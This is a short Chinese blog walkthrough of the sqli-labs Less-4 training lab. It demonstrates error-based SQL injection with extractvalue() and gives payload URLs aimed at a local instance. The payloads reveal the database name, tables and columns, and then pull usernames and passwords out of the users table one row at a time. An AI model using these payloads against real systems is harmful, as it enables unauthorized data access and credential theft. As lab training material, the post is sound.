-
sqli-labs(Less-4) extractvalue闯关
extractvalue() - Xpath类型函数
1. 确认注入点如何闭合的方式
2. 爆出当前数据库的库名
http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select database()))) --+- 1
3. 爆出当前数据库的表名http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1))) --+- 1
注意:报错注入不能使用group_concat()函数直接将所有信息获取出来,只能一条一条获取,而且必须使用limit 0,1控制
通过不断调整limit 0,1 得到users表
4. 爆出表中的字段名http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))) --+- 1
通过不断调整limit 0,1 得到所有的字段名id,username,password5. 获取表中内容
http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select concat(id,username,password) from users limit 0,1))) --+- 1
可在concat中添加分隔符 更方便数据的获取http://127.0.0.1/sqlilabs/Less-4/?id=1") and extractvalue(1,concat('~',(select concat(id,'~',username,'~',password) from users limit 0,1))) --+- 1
通过不断调整limit 0,1 即可得到全部的账号密码 -
相关阅读:
开发自己的Prometheus Exporter、实现自定义指标
多数元素(Java版)
我辞职了!“没有Python编程经验的我,连简历都不敢投”
Systemverilog-- OOP--对象的拷贝
Spring项目配置
手把手教学一文安装Keil5(MDK)固件支持包
Springboot毕设项目收费书屋管理系统8xjjejava+VUE+Mybatis+Maven+Mysql+sprnig)
瑞萨e2studio(25)----电容触摸配置(2)
基于Qt QProcess获取linux启动的程序、QScreen 截屏、GIF动画实现
【开源】JAVA+Vue.js实现企业项目合同信息系统
- 原文地址:https://blog.csdn.net/weixin_46329243/article/details/134418726